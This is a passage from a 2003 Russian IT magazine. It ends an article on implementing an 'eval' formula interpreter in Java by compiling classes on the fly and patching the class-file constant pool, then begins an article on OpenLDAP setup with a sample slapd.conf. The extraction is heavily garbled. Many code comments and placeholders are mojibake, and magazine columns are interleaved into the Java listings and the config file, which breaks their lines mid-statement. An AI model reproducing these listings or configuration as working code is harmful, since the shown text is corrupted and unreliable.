файлы. Сколько их появится, заранее сказать невозмож-
но (без полного синтаксического анализа исходного кода).
Так, каждый анонимный класс породит отдельный .class-
файл. Но, по крайней мере, должен появиться .class-файл,
соответствующий главному public-классу, объявленному
в исходном тексте (если, конечно, исходный текст не со-
стоял из описаний одного или нескольких не-public клас-
сов). В качестве последней «страховки» имеет смысл про-
верить существование этого .class-файла – его отсутствие
говорит о неверных настройках компилятора.
Затем остается только загрузить сгенерированный .class-
файл. Для этого нужен собственный загрузчик классов –
наследник ClassLoader, умеющий загружать классы из не-
стандартного каталога (в нашем случае из временного ка-
талога, созданного внутри каталога временных файлов опе-
рационной системы). Эта задача подробно рассматривалась
во второй части статьи: «ClassLoader – скрытые возможнос-
ти». Здесь мы не будем на ней останавливаться.
В завершение стоит добавить, что скомпилированные
68
и загруженные классы имеет смысл кэшировать в опера-
тивной памяти с помощью таблицы HashMap, ставящей
каждому исходному тексту в соответствие результирую-
щий объект Class – загруженный Java-класс. Если нужно
скомпилировать исходный текст, идентичный тексту, ко-
торый когда-то уже компилировался, то в большинстве
случаев нет смысла компилировать его повторно – дос-
таточно извлечь готовый класс из кэша.
Eval на Java: интерпретатор формул
Теперь мы располагаем чрезвычайно мощным инструмен-
том. Мы умеем компилировать произвольные исходные тек-
сты Java, заданные в виде строковой переменной, и загру-
жать получаемые при этом классы. Обычно такую технику
называют самопрограммированием. Эта возможность тра-
диционно присутствует в медленных интерпретируемых
скриптовых языках типа JavaScript или Perl, но отсутствует
в высокоэффективных компилируемых языках (к которым
относится и Java), исключая разве что Ассемблер. Факти-
чески, мы снабдили язык Java самопрограммированием.
Но пока что пользоваться этой техникой не очень удоб-
но.
В скриптовых языках типа JavaScript или Perl самопрог-
раммирование выглядит крайне просто. Например, в
JavaScript можно написать так:
var a= 23;
var b= 45;
var formula= "a+b";
var result= eval(formula);
Оператор eval исполняет переданный ему фрагмент
JavaScript-кода так, как если бы он непосредственно
был вставлен в общий JavaScript-код вместо самого
оператора eval.
Мы попробуем реализовать аналогичную технику в
рамках Java.
Java – не JavaScript, и в точно таком же виде реализо-
вать функцию eval здесь вряд ли возможно. В качестве
ближайшего Java-аналога eval, мы поставим следующую
задачу.
Требуется реализовать статический метод некоторо-
го класса-библиотеки (допустим, Evaluator), имеющий сле-
дующий интерфейс:
public Object eval(
String javaExpression,
Object context) throws Exception
В качестве javaExpression передается произвольное вы-
ражение Java, например то же «a+b». В качестве context
передается объект, предоставляющий «пространство
имен». Это значит, что в выражении javaExpression долж-
на быть возможность без дополнительных уточнений об-
ращаться ко всем public- и, может быть, protected-членам
объекта context. Так, в случае формулы «a+b» объект context
должен содержать числовые (или строчные) поля a и b. В
своем результате eval возвращает объект Java, получае-
мый в результате интерпретации выражения javaExpression.
Приведенный выше пример на JavaScript для Java выг-
лядел бы примерно так:

public static class Context {
public int a,b;
} }
...
public void ÍåêîòîðûéÌåòîä() {
...
Context c= new Context();
c.a= 23;
c.b= 45;
String formula= "new Integer(a+b)";
Integer result= (Integer)Evaluator.eval(formula,c);
...
} дыдущего раздела.) Вместо «имя_класса_context» подстав-
Язык Java по обыкновению создает затруднения при
попытке работать с примитивными типами на общих ос-
нованиях – их приходится заменять соответствующими
классами-оболочками. Специально для упрощения рабо-
ты с примитивными типами имеет смысл дополнить ос-
новной метод eval версиями evalInt, evalLong, evalFloat,
evaDouble, evalBoolean, возвращающими результат соот-
ветствующего примитивного типа. Тогда последние 2 стро-
ки примера выглядели бы проще:
...
String formula= "a+b";
int result= Evaluator.evalInt(formula,c);
...
Наконец, если считать, что наш пример является час-
тью реализации нестатического метода некоторого клас-
са, то пример можно было бы упростить еще больше:
public class ÍåêîòîðûéÊëàññ {
...
public int a,b;
public void ÍåêîòîðûéÌåòîä() {
...
a= 23;
b= 45;
String formula= "a+b";
int result= Evaluator.evalInt(formula,this);
...
}
} Приведенное решение, разумеется, неизящно. В фор-
Это практически так же удобно, как и eval в скрипто-
вых языках.
Как решить поставленную задачу – реализовать опи-
санные методы eval, evalInt и прочие?
Существует достаточно элементарное частичное ре-
шение.
Потребуем, чтобы все обращения к членам объекта
context в формуле javaExpression производились не напря-
мую, а через некоторую дополнительную переменную –
ссылку на объект context. Формула в этом случае приобре-
тает примерно такой вид: «c.a+c.b» (имя ссылки «c» могло
бы быть дополнительным аргументом метода eval).
В этом варианте задачу решить легко. Конструируем
«на лету» текст Java-класса:
import java.io.*;
import java.util.*;
êàêèå-íèáóäü åùå ïîëåçíûå import,
êîòîðûå ìîãóò ïðèãîäèòüñÿ âíóòðè ôîðìóëû
public class ___ExpressionNNN {
public static int ___performEval(
èìÿ_êëàññà_context c)
{ но этот новый экземпляр при вызове метода ___perform-
int returnValue= òåêñò_ôîðìóëû;
№2(3), февраль 2003
программирование
return returnValue;
}
Вместо NNN подставляется некоторый уникальный ин-
декс – свой для каждого текста формулы. (Если разные
формулы будут интерпретироваться с помощью разных
классов, то эти классы можно будет кэшировать и не ком-
пилировать повторно – смотри о кэшировании в конце пре-
ляется context.getClass().getName(), вместо «текст_форму-
лы» – значение javaExpression.
Тип результата int метода ___performEval и тип перемен-
ной returnValue соответствуют варианту метода evalInt. Дру-
гие варианты – eval, evalDouble и прочие – должны исполь-
зовать другой тип (соответственно Object, double, и т. д.).
Имя «c» аргумента ___performEval – это имя, под ко-
торым объект context будет доступен внутри формулы. Оно
может быть дополнительным аргументом методов eval,
evalInt, ...
Компилируем полученный текст класса и загружаем
скомпилированный класс, как описано в предыдущих раз-
делах. Затем средствами отражений вызываем его ста-
тический метод ___performEval, передавая ему в качестве
аргумента наш объект context, и возвращаем полученный
результат. Задача решена.
Дополнительная переменная returnValue позволяет пе-
редавать в качестве формулы javaExpression фрагменты
кода, состоящие более чем из одного оператора Java. В
этом случае по умолчанию результатом вызова eval ока-
жется результат первого оператора, но всегда можно бу-
дет в последнем операторе написать что-нибудь вроде
returnValue= ðåçóëüòàò_íàøèõ_âû÷èñëåíèé;
и тем самым вернуть другой результат.
муле приходится ссылаться на члены класса-контекста че-
рез громоздкую запись типа «c.a». Попробуем избавить-
ся от явной ссылки «c.». Язык Java разрешает ссылаться
непосредственно, без дополнительных уточнений, на чле-
ны текущего класса, его предков, члены класса, по отно-
шению к которому текущий является вложенным, и чле-
ны предков этого класса. Если класс, которому принад-
лежит метод ___performEval, унаследовать от класса
context.getClass().getName() или вложить в другой класс,
унаследованный от context.get-Class().getName(), то к чле-
нам этого предка можно будет обращаться из нашей фор-
мулы непосредственно. Метод ___performEval, разумеет-
ся, нужно будет сделать нестатическим.
Таким способом формулу типа «a+b» скомпилировать
удастся – синтаксически все будет соблюдено. Но как до-
биться, чтобы a и b ссылались именно на члены данного
экземпляра context, переданного в качестве аргумента в
метод eval (или evalInt, evalDouble, ...)? Все, что можно
сделать «легально» для исполнения формулы – создать
новый экземпляр для нашего нового класса (или по эк-
земпляру для серии вложенных классов) и указать имен-
Eval через отражения. Виртуальная машина Java не по-
69
 программирование
зволит «подменить» экземпляр нового временного клас-
са объектом context, так же context является предком на-
шего нового объекта, и его нельзя использовать там, где
декларировано использование объекта-потомка.
Приходит в голову банальное решение – перед вызо-
вом ___performEval скопировать все поля объекта context
в заново созданный экземпляр наследника context.get-
Class().getName(), а в конце скопировать все поля обрат-
но (на случай, если формула их изменяла). Все это в прин-
ципе осуществимо средствами отражений, но вряд ли та-
кое решение можно назвать качественным. Если полей
много, такое копирование может занять много времени.
Кроме того, в сложных случаях такое поведение попрос-
ту может оказаться ошибочным. Представьте себе, что
некоторый внешний поток постоянно наблюдает за состо-
янием экземпляра context, и каждое изменение его со-
стояния, в том числе внутри формулы (в результате вызо-
ва методов context), должно быть немедленно обнаруже-
но. Очевидно, при описанном подходе изменения вообще
обнаружены не будут. Все изменения будут произведены
с другим объектом – копией context, а в момент присваи-
вания новых полей полям экземпляра context наш метод
eval «не будет знать», как сообщить об этих изменениях.
Хотелось бы попытаться все-таки получить доступ не-
посредственно к экземпляру context.
Решение существует. Для этого нам придется «обма-
нуть» компилятор – создать .class-файл, который не мо-
жет быть создан «законным» компилятором javac.
Рассмотрим следующий код Java:
import java.io.*;
import java.util.*;
êàêèå-íèáóäü åùå ïîëåçíûå import,
êîòîðûå ìîãóò ïðèãîäèòüñÿ âíóòðè ôîðìóëû
public class ___ExpressionNNN
extends èìÿ_êëàññà_context
{
public class ___Performer {
public int ___performEval() {
int returnValue= òåêñò_ôîðìóëû;
return returnValue;
} ___ExpressionNNN «подсунуть» конструктору наш экземп-
}
} ляр context, задача была бы решена. Метод ___performEval
Все, как в прошлый раз, но теперь добавился вло-
женный класс ___Performer. Метод ___performEval те-
перь нестатический и не обладает аргументом, а вне-
шний класс ___ExpressionNNN унаследован от
context.getClass().getName().
Во что компилируется такой исходный код?
В результате компиляции получается 2 .class-файла –
___ExpressionNNN.class и ___ExpressionNNN$___Per-
former.class. Рассмотрим их внимательно с помощью ка-
кого-нибудь дизассемблера, например утилиты javap (с
ключами -private и -c).
Класс ___ExpressionNNN здесь – «пустышка». Он не
содержит ни одного члена, кроме пустого (автоматичес-
ки добавленного) конструктора. Этот класс – наследник
context.getClass().getName().
Класс ___Performer имеет следующий вид:
public class ___ExpressionNNN$___Performer {
70
// Fields
private final ___ExpressionNNN this$0;
// Constructors
public ___ExpressionNNN$___Performer(
___ExpressionNNN p0)
{
ðåàëèçàöèÿ: êîïèðóåò p0 â this$0
}
// Methods
public int ___performEval()
{
ðåàëèçàöèÿ, ñîäåðæàùàÿ ñêîìïèëèðîâàííûé
òåêñò íàøåé ôîðìóëû: äëÿ îáðàùåíèé ê
a,b è äðóãèì ÷ëåíàì context
èñïîëüçóåòñÿ ññûëêà this$0
}
}
Обратите внимание на поле this$0. Это «скрытый ме-
ханизм» языка Java, позволяющий добираться из вложен-
ных нестатических классов до текущих экземпляров со-
держащих их внешних классов. Заметьте: хотя идентифи-
катор this$0 является корректным с точки зрения синтак-
сиса Java, компилятор javac не позволит объявить поле с
таким именем в обычном классе – идентификатор «заре-
зервирован для внутреннего использования».
Вызов ___performEval через отражения выглядит сле-
дующим образом:

Вначале нужно создать экземпляр класса ___Expres-
sionNNN (обычным вызовом Class.newInstance).

Затем нужно отыскать (единственный) конструктор клас-
са ___ExpressionNNN$___Performer и вызвать его (через
java.lang.reflect.Constructor), передав в качестве аргумента
ссылку на созданный экземпляр ___ExpressionNNN. Бу-
дет создан экземпляр ___ExpressionNNN$___Performer.

Затем нужно обычным образом (через java.lang.ref-
lect.Method) отыскать и вызвать метод ___performEval,
передав методу invoke в качестве параметра ссылку
на только что созданный экземпляр ___Expres-
sionNNN$___Performer.
Если бы на шаге 2 удалось вместо нового экземпляра
работал бы (через ссылку this$0) с нашим экземпляром,
т.е. выполнил бы нашу формулу в требуемом контексте.
Как уже говорилось выше, виртуальная машина Java
не допускает передачи в качестве аргумента типа
___ExpressionNNN экземпляра его предка context.get-
Class().getName().
Но можно слегка изменить класс ___Performer. Действи-
тельно, если в классе ___Performer везде заменить имя
класса ___ExpressionNNN на context.getClass().getName()
(прежде всего тип поля this$0 и тип аргумента конструкто-
ра), то этот класс останется с точки зрения виртуальной
машины вполне корректным. Класс ___ExpressionNNN не
добавляет к своему предку ни одного нового члена, к кото-
рому метод ___performEval мог бы попытаться обратиться
через this$0. При работе с таким скорректированным клас-
сом через отражения на шаге 2 требования к аргументу
конструктора были бы слабее: можно было бы передать
ссылку на экземпляр класса context.getClass().getName(),
в частности на наш экземпляр context.

Такую коррекцию невозможно сделать «легальным»
путем, изменяя исходный текст и вызывая компилятор
javac. Стандартный компилятор при генерации вложен-
ного класса непременно придаст ссылке this$0 точный
тип того класса, в который вложен данный. Но можно
скорректировать уже скомпилированный .class-файл
___ExpressionNNN$___Performer.class.
Это не так сложно, как кажется. Формат .class-файлов
спроектирован очень грамотно и удобен для наших целей.
В начале файла идет так называемый «пул кон-
стант», в котором собраны все символьные идентифи-
каторы (в кодировке UTF-8), в том числе имена всех
упоминаемых классов. Весь .class-файл, в частности
пул констант, организован в виде последовательности
секций примерно такого вида:

код_типа_секции

содержимое_фиксированной_длины
или

код_типа_секции

длина_секции

содержимое_переменной_длины
Если в произвольной секции изменить содержимое и со-
ответствующим образом подправить длину секции (размер
файла при этом тоже поменяется), то файл сохранит свою
корректность. В .class-файле не встречаются прямые сме-
щения от начала файла или длины в байтах каких-то фраг-
ментов файла, за исключением длин элементарных секций.
Имя класса ___ExpressionNNN может встречаться внут-
ри файла ___ExpressionNNN$___Performer.class в виде
строковых констант трех видов:

непосредственно строка «___ExpressionNNN» (исполь-
зуется не всеми компиляторами);

строка «L___ExpressionNNN;» – внутреннее имя типа
___ExpressionNNN: именно таким образом виртуальная
машина «именует» классы «внутри себя» (для примитив-
ных типов и массивов используются другие обозначения);

строка «(L___ExpressionNNN;)V» – сигнатура конструк-
тора или любого другого метода с единственным ар-
гументом типа ___ExpressionNNN.
Если бы наш класс ___ExpressionNNN был вложен
внутрь какого-либо некорневого пакета (в наших приме-
рах он размещается в корневом пакете), то в его полном
имени нужно было бы заменить точки символами “/”.
Строковые константы, в частности перечисленные
выше, представлены в пуле констант в виде следую-
щих цепочек байтов:

1 байт: 1 (код строкового типа);

2 байта: длина length строковой константы в кодиров-
ке UTF-8 (сначала старший байт, потом младший);

length байтов: содержимое строковой константы в ко-
дировке UTF-8.
Все, что нам нужно сделать – загрузить файл
___ExpressionNNN$___Performer.class в виде массива бай-
тов, отыскать в нем все такие цепочки байтов для строк
«___ExpressionNNN», «L___ExpressionNNN;», «(L___Expres-
sionNNN;)V» и заменить их соответствующими цепочками
№2(3), февраль 2003
программирование
для строк «XXXX», «LXXXX;», (LXXXX;)V». Здесь XXXX –
полное имя класса context, в котором точки (разделители
имени пакета) заменены знаком “/”:
context.getClass().getName().replace('.','/')
Полученный новый массив байтов (другой длины) нуж-
но записать обратно в файл ___ExpressionNNN$___Per-
former.class.
Если имя ___ExpressionNNN не используется в Java-
приложении ни для каких других целей – для максималь-
ной уверенности можно заменить его чем-нибудь вроде
___Expression_Asj5Sjl3_NNN, – то полученный .class-файл
будет вполне корректным. Остается загрузить его, создать
экземпляр, передав конструктору в качестве аргумента
наш объект context, и выполнить метод ___performEval().
Задача решена полностью.
Возможно, в формулах имеет смысл открыть непосред-
ственный доступ (без уточняющего имени класса) к како-
му-либо набору стандартных функций или констант. Напри-
мер, в математических формулах естественнее смотрелась
бы запись «sin(a+PI/4)», а не «Math.sin(a+Math.PI/4)». Для
этого достаточно автоматически добавить желаемый на-
бор функций и констант во вложенный класс ___Performer.
Некоторое неудобство приведенного решения связано с
тем, что класс объекта context обязан быть public, а в случае
локального класса – public static. В частности, недопустимо
использовать анонимные классы или локальные классы,
объявленные внутри методов. В противном случае нам по-
просту не удастся унаследовать от него класс ___Expres-
sionNNN, расположенный, вообще говоря, в совершенно
другом пакете (в наших примерах – в корневом пакете).
Очевидно также, что для достижения хорошей эффек-
тивности все скомпилированные формулы необходимо кэ-
шировать, чтобы одна и та же формула не компилирова-
лась повторно. Имеет смысл для каждой пары «формулы,
экземпляр context» сохранить (в таблице HashMap) готовый
объект java.lang.reflect.Method для метода ___performEval и
экземпляр вложенного класса ___Performer, чтобы при по-
вторном обращении к eval осталось просто вызвать метод
invoke. Также есть смысл проверить, что одна и та же фор-
мула с одним и тем же context вызывается повторно, и в
этом случае перейти на особо быструю ветку – не обращаю-
щуюся к таблице HashMap. Подобная оптимизация позво-
ляет достичь чрезвычайно высокого быстродействия, недо-
стижимого для интерпретируемых скриптовых языков: на-
кладные расходы будут укладываться в доли микросекунды
(на компьютерах класса Pentium-III 800).
Идея описанного выше изящного решения принадлежит
моему коллеге, Алексею Вылегжанину (anv@siams.com).
Разумеется, это решение (в отличие от первого вари-
анта, требующего использования в формулах ссылки «с.»),
не является стопроцентно переносимым. Оно зависит от
особенностей компилятора javac, которые в принципе мо-
гут измениться в следующей версии Java. Например, ком-
пилятору ничто не мешает вставить в класс ___Performer
явную проверку, что поле this$0 принадлежит нужному типу,
причем сформировать имя типа динамически путем сло-
жения строк «___Expres» и «sionNNN». Тогда скорректиро-
71
 программирование
ванный нами класс работать не будет. Кажется маловеро-
ятным, что подобное произойдет. Но на всякий случай опи-
санное решение желательно заново тестировать с каждой
новой версией Sun Java SDK.
Технология интерпретации формул на Java может ока-
заться чрезвычайно полезной в сложных приложениях,
гибко настраиваемых пользователем. Скажем, процеду-
ра построения графика или статистического анализа мо-
жет принимать на вход не только массив чисел, но и неко-
торую набранную пользователем аналитическую форму-
лу. При заполнении сложной формы с множеством пара-
метров можно разрешить в некоторых полях указывать
формулы, оперирующие другими полями формы (напри-
мер, «предыдущее_поле + 1»). Можно снабдить пользо-
вателя простейшим формульным калькулятором, который
всегда под рукой и обладает функциями, специфичными
для данного приложения.
Единственной серьезной проблемой может оказаться
безопасность. Если разрешить пользователю Java-прило-
жения самостоятельно писать формулы, исполняемые си-
стемой, то пользователь сможет, вообще говоря, выпол-
нить любой законный оператор языка Java – скажем, доб-
раться до содержимого диска. Если это недопустимо, то
придется разрабатывать специальный менеджер безопас-
ности («песочницу») для исполнения формул или жестко
контролировать текст формулы.
Заключение
Нашу экскурсию по миру отражений можно считать за-
конченной. Мы рассмотрели основные задачи по управ-
лению классами: доступ к произвольным классам и их
членам, загрузку классов из произвольного источника и,
наконец, компиляцию новых классов из Java-файлов либо
72
«на лету». Эти технологии позволяют профессионально
решать по-настоящему сложные задачи, а также могут
быть чрезвычайно удобны и в небольших утилитах.
Я сознательно не стал приводить Java-реализацию боль-
шинства из описанных выше технологий. Кроме того что это
было бы чрезвычайно громоздко, мне кажется, что подоб-
ные задачи лучше разработчику решать самостоятельно,
если только готовое решение не существует в виде стан-
дартизованных и общеизвестных библиотек фирмы Sun или
другой фирмы, заслуживающей не меньшего доверия. Ра-
зумеется, я располагаю законченной библиотекой, вопло-
щающей все приведенные идеи, в том числе динамическую
загрузку классов, описанную во второй части статьи. Но я
никоим образом не берусь утверждать, что моя библиотека
достаточно грамотно реализована и хорошо протестирова-
на – настолько же, насколько это можно сказать о библиоте-
ках фирмы Sun. Если вы реализуете необходимые функции
самостоятельно, то, по крайней мере, вы сможете достаточ-
но свободно отлаживать их и совершенствовать, что было
бы гораздо труднее сделать с чужим кодом.
При написании статьи были использованы официаль-
ные материалы фирмы Sun, приведенные на сайте http://
java.sun.com, а также следующие книги:

Арнолд К., Гослинг Дж., Холмс Д. Язык программиро-
вания Java. Издательский дом «Вильямс», Москва –
С.-Петербург – Киев, 2001.

Вебер Дж. Технология Java(TM) в подлиннике. «BHV –
Санкт-Петербург», С.-Петербург, 1997.
Все приведенные в статье фрагменты кода я старался
тщательно тестировать. Если вы обнаружите в моих тек-
стах ошибки или неточности, а также в случае любых воп-
росов буду рад вашим письмам.
 безопасность

OPENLDAP
И ЗАЩИТА ДАННЫХ

В настоящее время при администрировании крупных сетей часто используется система LDAP.
Но документации на русском по ней практически нет, а документация на английском очень уж
«размазана». Поэтому я решил полностью описать механизмы настройки сервера OpenLDAP и его
взаимодействия с уже существующими сетевыми сервисами...

При администрировании сети на опре-
делённом этапе возникает проблема
централизованного контроля аутенти-
фикации. Это особенно актуально для
крупных сетей (100 и более пользова-
телей). Раньше единственным прием-
лемым выходом в такой ситуации была
установка Novell Netware как централь-
ного сервера или службы NIS, если
сеть основана на *nix машинах, что
бывает довольно редко. У Netware
(версии 4 и старше) существует очень
грамотный механизм NDS (служба ди-
ректорий Novell), позволяющий со-
здать единое дерево сети, в котором
каждый компонент сети является
объектом службы директорий. Причём
каждый объект обладает определён-
ными параметрами для его идентифи-
кации. Например, объект «пользова-
тель» имеет своё имя, телефон, отдел,
служебное положение, скрипт для вхо-
да в систему. Каждый пользователь
обладает определёнными правами, не-
которые из которых наследуются из
прав группы, которой данный пользо-
ватель принадлежит. При входе в сис-
тему каталогов пользователь получа-
ет доступ только к «своим» файлам.
При этом сама система каталогов мо-
жет находиться на нескольких серве-
рах. Конечно, здесь очень много ню-
ансов и очень много полезных возмож-
ностей, но я перейду сразу же к основ-
ной теме: службе директорий, работа-
ющей в TCP/IP-сетях – LDAP
(Lightweight Directory Access Protocol).
Теория и терминология
Раньше в *nix существовала только
ВСЕВОЛОД СТАХОВ
одна возможность централизован-
ной аутентификации – службы NIS,
работающие через UDP. LDAP пост-
роен по объектно-ориентированно-
му принципу и позволяет с лёгкос-
тью добавлять и изменять объекты
при помощи файлов схем. Кроме
этого, LDAP обладает большими
возможностями в плане структури-
рованности и работы с клиентами
различных платформ. Множество
приложений поддерживают LDAP че-
рез PAM, но об этом далее. На осно-
ве LDAP легко построить гетероген-
ные сети, кроме этого, информация
об объектах хранится в древовидной
структуре. Например, вот как может
выглядеть дерево для крупной орга-
низации, разбросанной по несколь-
ким странам с дочерними фирмами:

74
 безопасность

ROOT

Ñòðàíà=C
Ñòðàíà

Îðãàíèçàöèÿ=O
Îðãàíèçàöèÿ

Îòäåë=OU Îòäåë Îòäåë Îòäåë

Ìåñòîðàñïîëîæåíèå=L ìåñòî ìåñòî ìåñòî ìåñòî ìåñòî

Ïåðñîíà Ïåðñîíà Ïåðñîíà Ïåðñîíà Ïåðñîíà

Ãëàâíûé
Ãëàâíûé

Ãëàâíûé Ãëàâíûé
Îáüåêòû íèæíåãî óðîâíÿ

Ñåðâåð Ñåðâåð Ñåðâåð

Ãëàâíûé Ïåðñîíà Ãëàâíûé Ïåðñîíà

Ïðèíòåð Ïðèíòåð

Êîìïû Êîìïû Êîìïû Êîìïû Êîìïû

Îáúåêòû âåðõíåãî óðîâíÿ(C, O, OU, DC, L) ÿâëÿþòñÿ êîíòåéíåðíûìè, ò.å. Ìîãóò ñîäåðæàòü äðóãèå îáúåêòû. Îáúåêòû íèæíåãî
óðîâíÿ îáû÷íî òàêîé îñîáåííîñòüþ íå îáëàäàþò. Ïðèâåä¸ííàÿ ñõåìà æåñòêî íå çàêðåïëÿåò èåðàðõèþ îáúåêòîâ, äåðåâî ìîæåò ñòðîèòü-
ñÿ â ðàçëè÷íîì ïîðÿäêå. Ïðè èñïîëüçîâàíèè èíòåðíåò-äåðåâà ìîæåò èñïîëüçîâàòüñÿ èåðàðõèÿ îïðåäåëåíèé dc. Çà÷àñòóþ òàêæå
ïðèìåíÿþò ñìåøàííûå ñõåìû ñòàíäàðòíîé è èíòåðíåò íîòèôèêàöèè. Äëÿ âûáîðà êîíêðåòíîé âåòâè èñïîëüçóþò òåðìèí dn ïîèñêà -
âåðõíèé îáúåêò, îò êîòîðîãî íà÷èíàåòñÿ ïîèñê.

Здесь можно сразу же опреде-
литься с сокращениями, принятыми
в службе директорий:

С(ountry) – страна;

ST(ate) – имя региона, области
или штата;

L(ocation) – имя города, посёлка,
деревни;

O(rganization) – имя компании;

O(rganizational)U(nit) – раздел
компании.
Данные объекты дерева являются
основополагающими, т.к. являются
контейнерами для других объектов. На
их основе обычно строится дерево ка-
талогов. Самый верхний уровень пред-
ставляет объект root (и здесь рут!), от
него происходят скелетные объекты,
внутри которых и заключаются конк-
ретные объекты-листья дерева. Если
представить себе дерево, то скелет-
ные объекты-контейнеры будут играть
роль веток, а обычные объекты – роль
листьев. Вообще, древовидная струк-
тура имеет множество преимуществ по
сравнению с линейной (/etc/passwd),
т.к. позволяет точно определить нахож-
дение пользователя или иного объек-
та. /etc/passwd предоставляет лишь
жалкое подобие данной модели – поле
GECOS, но работая с LDAP, просто не-
обходимо указывать полное описание
объекта. Для обозначения полного
описания (+имени) объекта относи-
тельно скелета дерева используется
термин DN (distinguished name – назна-
ченное имя, контекст). На этом по-
звольте завершить описание теории и
перейти к практике...
Общая настройка
сервера slapd
Займёмся самым интересным: на-
стройкой сервера. Я использовал
OpenLDAP и всё нижесказанное от-
носится только к данному пакету
LDAP.
Для начала необходимо иметь сле-
дующие вещи (я предполагаю уста-
новку из пакетов, а не из сырцов; ус-
тановка из сырцов также не должна
вызвать затруднений, но у меня
оных просто не было):

библиотеки LDAP;

сервер LDAP (slapd);

pam_ldap и nss_ldap для аутенти-
фикации через LDAP.
После чего надо настроить сер-
вер на работу в вашей службе ката-
логов. Открываем файл конфигура-
ции /etc/[open]ldap/slapd.conf (при
установке из исходников /usr/local/
etc/openldap). Он содержит прибли-
зительно следующее:

№2(3), февраль 2003 75

безопасность
# Ïðèìåðíûé ôàéë êîíôèãóðàöèè ñåðâåðà slapd.conf. Добавлю, что в этом файле мож-
include /usr/share/openldap/schema/core.schema
include /usr/share/openldap/schema/cosine.schema но ещё указывать дополнительные
include /usr/share/openldap/schema/corba.schema параметры для взаимодействия не-
include /usr/share/openldap/schema/inetorgperson.schema
include /usr/share/openldap/schema/java.schema скольких серверов (реплик): в частно-
include /usr/share/openldap/schema/krb5-kdc.schema сти, основной сервер, вторичные сер-
include /usr/share/openldap/schema/kerberosobject.schema
include /usr/share/openldap/schema/misc.schema вера, пароли доступа к ним и т. д. Но
include /usr/share/openldap/schema/nis.schema это уже другая тема. В основном не-
include /usr/share/openldap/schema/openldap.schema
# Âêëþ÷àåì áàçîâûå îïðåäåëåíèÿ îáúåêòîâ äèðåêòîðèé è äîïîëíèòåëüíûå êëàññû обходимо сделать 3 вещи:
# îáúåêòîâ, ôàéëû ñõåì.
# Âêëþ÷àåì ôàéë, îïèñûâàþùèé ïðàâà äîñòóïà ê ÁÄ:

установить суффикс БД и выбрать
include /etc/openldap/slapd.access.conf тип контекста (глобальной сети
# Ñòàíäàðòíûå ôàéëû, íåîáõîäèìûå äëÿ ðàáîòû äåìîíà: ôàéë èäåíòèôèêàòîðà è или организации);
# êîìàíäíîé ñòðîêè.
pidfile /var/run/ldap/slapd.pid
указать контекст администратора
argsfile /var/run/ldap/slapd.args LDAP;
# Ïóòü ê äîïîëíèòåëüíûì ìîäóëÿì ñåðâåðà.
modulepath /usr/lib/openldap
установить пароль администрато-
# Îïèñûâàåì ïàðàìåòðû ñîåäèíåíèÿ ÷åðåç SSL. ра LDAP с помощью программы
# Õîñò äëÿ áåçîïàñíîé àóòåíòèôèêàöèè SASL.
sasl-host localhost slappasswd.
# Åñëè âû õîòèòå ðàçðåøèòü ñîåäèíåíèå ÷åðåç TLS òî óáåðèòå êîììåíòàðèé èç
# ñëåäóþùèõ ñòðîê (â äàííîì ïðèìåðå îí åñòü).
#TLSRandFile /dev/random Чтобы установить алгоритм шиф-
#TLSCipherSuite HIGH:+SSLv2 рования пароля, запускайте програм-
#TLSCertificateFile /etc/openldap/ldap.pem
#TLSCertificateKeyFile /etc/openldap/ldap.pem му slappasswd так:
# Ïóòü ê ôàéëó êëþ÷à
#TLSCACertificatePath /etc/openldap/
#TLSCACertificateFile /etc/openldap/ldap.pem slappasswd -h {àëãîðèòì_øèôðîâàíèÿ},
# Ïóòü ê ñåðòèôèêàòó õîñòà
#TLSVerifyClient 0
# Ïðîâåðêà êëþ÷à êëèåíòà вместе с символами {}, например:
# Ñàìîå ãëàâíîå - îïèñàíèå áàçû äàííûõ LDAP
database ldbm slappasswd -h {crypt}
# Òèï áàçû äàííûõ ldbm
suffix "dc=test,dc=ru"
#suffix "o=My Organization Name,c=US" или
# Ýòî îñíîâíîé ñóôôèêñ ÁÄ. Â îïðåäåëåíèè ñèñòåìû äèðåêòîðèé ñóùåñòâóåò òàê
# íàçûâàåìûé êîðíåâîé îáúåêò root. Ñóôôèêñ îïðåäåëÿåò ýòîò îáúåêò. Âîîáùå
# ñóùåñòâóåò 2 ñòàíäàðòà LDAP èìåí äëÿ ñêåëåòà äåðåâà: ìåòîä äëÿ ãëîáàëüíûõ slappasswd -h {md5}
# ñåòåé è ëîêàëüíûõ. Ïåðâûé èìååò ïîäîáíûé âèä è îïèñûâàåò URL àäðåñ:
# person.domain.com(cn=person,dc=domain,dc=com), à âòîðîé îïèñûâàåò
# îðãàíèçàöèþ(âîîáùå-òî ýòîò âèä ÿâëÿåòñÿ ñòàíäàðòíûì) è èìååò ñëåäóþùèé âèä: Вот и всё: сервер может хоть сей-
# person.organization_unit.organization.country(cn=person,ou=otd1,o=lab,c=RU) час начинать работать! Но толку пока
# âûáîð ìåòîäà çàâèñèò îò êîíêðåòíîãî íàçíà÷åíèÿ LDAP è îñîáîãî çíà÷åíèÿ íå èìååò.
#  äàííîé ñòàòüå ÿ èñïîëüçîâàë èíòåðíåò-íàèìåíîâàíèÿ äëÿ êðàòêîñòè, íî îáû÷íî â от него никакого: ведь мы не добави-
# êîìïàíèÿõ âñ¸ æå ÷àùå ïðèìåíÿåòñÿ âòîðîé ñïîñîá ïîñòðîåíèÿ ñêåëåòà äåðåâà. ли объектов. Сейчас я расскажу, как
rootdn "cn=admin,dc=test,dc=ru"
#rootdn "cn=Manager,o=My Organization Name,c=RU" создавать базу данных LDAP и про-
# Ýòî ïîëå ñîäåðæèò ïàðîëü àäìèíèñòðàòîðà îáúåêòà root(òî åñòü âñåé ÁÄ LDAP). водить аутентификацию через неё.
# Ïàðîëü ìîæåò õðàíèòüñÿ êàê â îòêðûòîì âèäå (íå ðåêîìåíäóåòñÿ!), òàê è â
# çàøèôðîâàííîì âèäå ñ óêàçàíèåì àëãîðèòìà øèôðîâàíèÿ ({crypt}, {MD5}, {SSHA},
# {crypt}, {SMD5}, {SHA}) Ïàðîëü æåëàòåëüíî óñòàíàâëèâàòü ïðîãðàììîé slappasswd,
# ïîçâîëÿþùåé óñòàíîâèòü íóæíûé àëãîðèòì øèôðîâàíèÿ.
Создание базы данных
rootpw secret Для первоначальной настройки не-
# rootpw {crypt}ijFYNcSNctBYg плохо было бы объяснить общий син-
# Ïàïêà, ãäå õðàíèòñÿ áàçà äàííûõ LDAP. Ýòà ïàïêà äîëæíà ñóùåñòâîâàòü äî çàïóñêà
